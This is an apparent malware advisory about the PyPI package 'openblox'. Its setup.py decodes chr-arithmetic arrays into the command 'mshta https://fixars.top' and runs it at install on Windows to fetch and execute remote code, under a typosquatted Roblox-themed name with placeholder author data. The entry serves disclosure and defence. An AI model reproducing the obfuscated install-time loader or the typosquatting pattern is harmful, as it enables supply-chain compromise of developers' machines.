MAL-2026-6504

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201) setup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on `pip install openblox` (and any setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to `mshta` and `https://fixars.top`. The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch `mshta https://fixars.top` — the mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name `openblox` with a Roblox-themed description, but the actual code is an unrelated `sqligen` SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library.